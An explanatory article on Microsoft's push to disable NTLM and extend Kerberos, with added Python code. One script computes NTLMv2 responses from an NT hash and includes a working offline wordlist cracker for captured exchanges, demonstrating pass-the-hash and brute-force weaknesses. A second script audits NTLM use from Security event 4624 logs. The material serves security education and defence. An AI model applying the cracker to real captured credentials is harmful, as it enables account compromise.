
Microsoft Pushing to Disable NTLM for More Secure Windows Authentication
Microsoft has kick-started an initiative to strengthen Windows authentication by disabling NT LAN Manager (NTLM). NTLM is a legacy authentication protocol that predates Active Directory, and it has been under scrutiny for years because of well-understood weaknesses that attackers routinely exploit. By addressing those weaknesses and steering Windows towards a stronger protocol, Microsoft aims to make authentication safer by default.
Kerberos Protocol to Be The Focus with New Features for Enhanced Security
To replace NTLM, Microsoft is pushing for wider adoption of Kerberos, the stronger authentication protocol that has been the default in Active Directory domains since Windows 2000. Kerberos provides mutual authentication: the client proves its identity to the server and the server proves its identity to the client, so a client cannot be tricked into authenticating to an impostor. With new features under development, Microsoft aims to extend Kerberos to the scenarios where Windows still falls back to NTLM today.
NTLM Protocol Considered Weak and Susceptible to Attacks
Microsoft's decision to phase out NTLM is driven chiefly by its susceptibility to attack. NTLM is a challenge-response protocol keyed on a hash of the user's password (the NT hash, an MD4 digest of the password) rather than on a session key issued by a trusted third party. That design has three consequences: anyone who obtains the hash can authenticate as the user without knowing the password; a challenge/response pair captured on the network can be brute-forced offline, without ever contacting the server; and because NTLM does not authenticate the server to the client, an attacker in the path can relay a legitimate authentication to a different service. By disabling NTLM and integrating stronger alternatives such as Kerberos, Microsoft underpins its commitment to improving the security of its operating system.
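To make the weakness concrete, here is an added illustration of the NTLMv2 computation as specified in MS-NLMP. It is not Microsoft's code and not code from the original article; the user name, domain, server challenge, client blob and password are constructed for the demo, and MD4 is written out in full because many OpenSSL 3 builds ship without it in hashlib. The example shows two things the paragraph states: a client holding only the stolen NT hash produces a valid response (the hash is password-equivalent), and an observer with one captured challenge/response pair can verify password guesses offline.

```python
"""NTLMv2 challenge/response built from the NT hash (added illustration)."""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4 digest; the NT hash is MD4 of the UTF-16LE password."""
    bit_len = (len(msg) * 8) & 0xFFFFFFFFFFFFFFFF
    msg = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (boolean function, additive constant, shifts, word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[j] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: what the SAM and NTDS.DIT store instead of the password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(nthash: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """MS-NLMP NtChallengeResponse = NTProofStr || blob, where
    NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob) and
    NTOWFv2   = HMAC-MD5(NT hash, UPPER(user) || domain in UTF-16LE).
    Only the hash enters the computation, so a stolen hash is as good as the password."""
    ntowf_v2 = hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    proof = hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def crack_ntlmv2(user: str, domain: str, server_challenge: bytes,
                 captured_response: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline check of password guesses against one captured exchange.
    The server is never contacted, so lockout policies do not apply;
    each guess costs one MD4 and two HMAC-MD5 computations."""
    proof, blob = captured_response[:16], captured_response[16:]
    for guess in wordlist:
        candidate = ntlmv2_response(nt_hash(guess), user, domain, server_challenge, blob)
        if hmac.compare_digest(candidate[:16], proof):
            return guess
    return None


def demo() -> Optional[str]:
    user, domain = "alice", "CORP"                        # constructed
    server_challenge = bytes.fromhex("0123456789abcdef")  # constructed
    # Minimal NTLMv2_CLIENT_CHALLENGE blob: version bytes, reserved, timestamp,
    # client nonce, reserved, empty AV_PAIR list. All values constructed.
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", 0x01D9E8F0A1B2C3D4)
            + bytes.fromhex("1122334455667788") + b"\x00" * 4 + b"\x00" * 4)
    # 1. A client that holds only the stolen hash still answers correctly.
    response = ntlmv2_response(nt_hash("password"), user, domain, server_challenge, blob)
    # 2. An observer of the exchange recovers the password without touching the server.
    return crack_ntlmv2(user, domain, server_challenge, response,
                        ["letmein", "Winter2023!", "password"])


if __name__ == "__main__":
    print("recovered password:", demo())
```

Nothing in the exchange above depends on a secret the server holds or on the server proving who it is, which is exactly what Kerberos adds: the KDC issues a ticket bound to a specific service, and the service's reply is authenticated back to the client.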
New Features Introduction
As part of Microsoft's effort to improve Windows Authentication and disable NTLM, the tech giant is introducing new advanced features to Kerberos. These features aim to enhance the protocol's capabilities, offering a more secure and user-friendly authentication process.
Initial and Pass Through Authentication Using Kerberos (IAKerb) for Scenarios without Visibility to a Domain Controller
One of the new features is Initial and Pass Through Authentication Using Kerberos (IAKerb). It lets a client that has no line of sight to a Domain Controller authenticate with Kerberos anyway, by routing its Kerberos messages through the application server it is connecting to, which does have a path to the DC. IAKerb is implemented as an extension of the Negotiate authentication package and allows the Windows authentication stack to proxy Kerberos messages through that server on the client's behalf. Because the Kerberos exchange is cryptographically protected end to end between the client and the KDC, the relaying server cannot replay or relay those messages. IAKerb is particularly useful in environments with firewall segmentation or in remote access scenarios.
Local Key Distribution Center (KDC) for Remote Authentication of Local User Accounts
Another major feature is a local Key Distribution Center (KDC) for Kerberos, which adds Kerberos support for local accounts. It builds on IAKerb and the Security Account Manager (SAM) of the target machine: Kerberos messages are exchanged with the remote machine and validated against its local account database, without any need for DCLocator, NetLogon or DNS. No line of sight to a Domain Controller is required, so local user accounts can authenticate remotely with Kerberos instead of falling back to NTLM.
Upcoming Microsoft Updates
Microsoft continues to make strides towards bolstering the security of Windows authentication. As part of its ongoing efforts to disable the dated NTLM protocol and shift towards a more secure alternative, several key updates are in the pipeline.
Updating Windows Components Built with NTLM to Use Negotiate Protocol
Microsoft plans to gradually modify Windows components that were built to call NTLM directly so that they use the Negotiate package instead. Negotiate selects Kerberos whenever it is available (IAKerb and the local KDC widen the cases where it is) and falls back to NTLM only when it is not, so legacy applications and services that cannot readily be updated keep working. The aim is a seamless transition from NTLM to Negotiate without compromising functionality or compatibility.
Management Control Extension for Better Tracking and Blocking NTLM Use
In conjunction with updating the components, Microsoft also intends to extend the NTLM management controls. Today's "Network security: Restrict NTLM" policies audit or block NTLM for a whole machine; the enhancement is meant to give organizations a clearer view of which services in their environment still use NTLM and to let IT administrators disable NTLM for a particular service, providing granular control over the legacy protocol's use.
Disabling of NTLM in Windows 11
Looking forward, the ultimate goal of these enhancements is to disable NTLM by default in Windows 11. Microsoft is taking a data-driven approach, monitoring the reduction in NTLM usage to determine a safe timeline for disabling it. In the meantime, Microsoft encourages customers to use the improved controls to prepare ahead. Once NTLM is disabled by default, the same controls will allow customers to re-enable it for compatibility reasons if necessary.
Microsoft’s Advice to Customers
In line with the focus on enhancing Windows authentication, Microsoft is giving customers guidance for a smooth transition through the upcoming changes. The advice has two parts: use the new controls to prepare for NTLM disablement, and audit current NTLM usage.
Encouraging Use of New Controls to Prepare for NTLM Disablement
Microsoft advises customers to start using the enhanced controls now for a head start in preparing for NTLM's disablement. By exercising these controls early, organizations can move to the more secure alternatives at their own pace. Because NTLM can be re-enabled for compatibility reasons, they can phase it out progressively while keeping essential services running.
Suggesting Cataloging and Auditing of NTLM use for Applications and Services
Microsoft also recommends that customers begin cataloging their NTLM usage. Existing policy and logging tools can show where and how extensively NTLM is used, and which applications would break if it were disabled: the "Network security: Restrict NTLM" audit policies write their findings to the Microsoft-Windows-NTLM/Operational event log, and Security event 4624 records the authentication package for every successful logon (AuthenticationPackageName is NTLM, and LmPackageName shows whether NTLM V1 or NTLM V2 was negotiated). For application developers the advice is to audit code for hard-coded use of the NTLM package and replace it with Negotiate; Negotiate is a security package name (for SSPI, or in the HTTP WWW-Authenticate header), not a command, and it picks Kerberos wherever Kerberos is available. Such proactive measures streamline the transition and limit the impact of NTLM disablement on day-to-day operation.
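As an added example of the cataloging step, the script below builds an NTLM inventory from Security event 4624 records, grouping logons by server, source host, account and NTLM version and listing the hosts that still negotiate NTLM V1. It is not Microsoft's tooling and not code from the original article; the four events are constructed for the demo, in the XML layout Windows writes (System/EventID, EventData/Data[@Name]) using the real 4624 field names, and the host and account names are invented.

```python
"""Catalog NTLM logons from Security event 4624 records (added example)."""
import xml.etree.ElementTree as ET
from collections import Counter
from typing import Dict, List, Optional

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _event(computer: str, fields: Dict[str, str]) -> str:
    """Build a constructed 4624 event in the shape Windows emits."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4624</EventID>'
            f"<Computer>{computer}</Computer></System>"
            f"<EventData>{data}</EventData></Event>")


# Constructed sample data: two NTLMv2 logons from a workstation, one Kerberos
# logon, and one NTLMv1 logon from a multifunction printer's scan account.
SAMPLE_EVENTS: List[str] = [
    _event("FS01.corp.example", {"TargetUserName": "alice", "TargetDomainName": "CORP",
           "LogonType": "3", "WorkstationName": "WS17", "IpAddress": "10.0.5.17",
           "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"}),
    _event("FS01.corp.example", {"TargetUserName": "bob", "TargetDomainName": "CORP",
           "LogonType": "3", "WorkstationName": "WS22", "IpAddress": "10.0.5.22",
           "AuthenticationPackageName": "Kerberos", "LmPackageName": "-"}),
    _event("FS01.corp.example", {"TargetUserName": "svc-scan", "TargetDomainName": "CORP",
           "LogonType": "3", "WorkstationName": "MFP-3F", "IpAddress": "10.0.9.40",
           "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"}),
    _event("FS01.corp.example", {"TargetUserName": "alice", "TargetDomainName": "CORP",
           "LogonType": "3", "WorkstationName": "WS17", "IpAddress": "10.0.5.17",
           "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"}),
]


def parse_4624(xml_text: str) -> Optional[Dict[str, str]]:
    """Flatten one event into a dict of its EventData fields; None if not a 4624."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4624":
        return None
    fields = {d.get("Name", ""): (d.text or "")
              for d in root.findall("e:EventData/e:Data", NS)}
    fields["Computer"] = root.findtext("e:System/e:Computer", default="", namespaces=NS)
    return fields


def ntlm_inventory(events: List[str]) -> Counter:
    """Count NTLM logons keyed by (server, source, account, NTLM version).
    Kerberos logons are skipped: they are already where we want to be."""
    inv: Counter = Counter()
    for xml_text in events:
        ev = parse_4624(xml_text)
        if ev is None or ev.get("AuthenticationPackageName") != "NTLM":
            continue
        source = ev.get("WorkstationName") or ev.get("IpAddress") or "?"
        account = f"{ev.get('TargetDomainName', '')}\\{ev.get('TargetUserName', '')}"
        inv[(ev["Computer"], source, account, ev.get("LmPackageName", "?"))] += 1
    return inv


def ntlmv1_sources(inv: Counter) -> List[str]:
    """Source hosts still negotiating NTLM V1; these go to the top of the fix list."""
    return sorted({src for (_, src, _, ver) in inv if ver == "NTLM V1"})


if __name__ == "__main__":
    inventory = ntlm_inventory(SAMPLE_EVENTS)
    for (server, src, acct, ver), n in sorted(inventory.items()):
        print(f"{server:20} {src:10} {acct:16} {ver:8} {n}")
    print("NTLM V1 sources:", ntlmv1_sources(inventory))
```

On a real file server the same XML comes from PowerShell's `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624}` via each event's `ToXml()` method, so the parser can be pointed at exported events unchanged; the entries with a device or service account as the source are the ones that typically block disablement and deserve the earliest attention.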